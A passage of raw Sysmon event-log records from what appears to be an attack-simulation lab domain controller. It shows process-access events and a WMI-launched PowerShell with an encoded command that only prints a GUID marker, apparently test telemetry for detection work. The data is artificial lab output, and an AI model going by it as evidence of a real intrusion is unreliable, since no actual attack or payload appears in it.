combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 11241100x80000000000000002239439Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.201{05ADC7E1-6D99-603E-A7AA-00000000AD01}11336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_fce5htz3.ewc.ps12021-03-02 16:53:45.201 10341000x80000000000000002239438Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.201{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6D99-603E-AAAA-00000000AD01}14736C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002239437Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.185{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-6D99-603E-A9AA-00000000AD01}6956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002239436Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.185{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239435Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.185{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239434Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.185{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239433Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.185{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239432Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.185{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-6D99-603E-A9AA-00000000AD01}6956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002239431Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.185{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D99-603E-A9AA-00000000AD01}6956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002239430Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.194{05ADC7E1-6D99-603E-A9AA-00000000AD01}6956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe /NoProfile /EncodedComma VwByAGkAdABlAC0ASABvAHMAdAAgADAAMwA0AGQAMwBjADkAZAAtAGQAOAA2ADgALQA0ADUAMgA4AC0AOQBhAGYAMgAtAGYAYQA5AGYAZQA3AGQAYwA5AGUANwBjAA==C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x80000000000000002239429Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.175{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6D99-603E-A7AA-00000000AD01}11336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239428Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.170{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D99-603E-A8AA-00000000AD01}13600C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239427Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D99-603E-A7AA-00000000AD01}11336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239426Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-A6AA-00000000AD01}15836C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239425Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-A5AA-00000000AD01}6212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239424Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-A4AA-00000000AD01}13336C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239423Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-A3AA-00000000AD01}5948C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239422Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.154{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6D98-603E-A5AA-00000000AD01}6212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239421Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.154{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6D98-603E-A5AA-00000000AD01}6212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239420Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239419Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239418Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239417Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239416Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d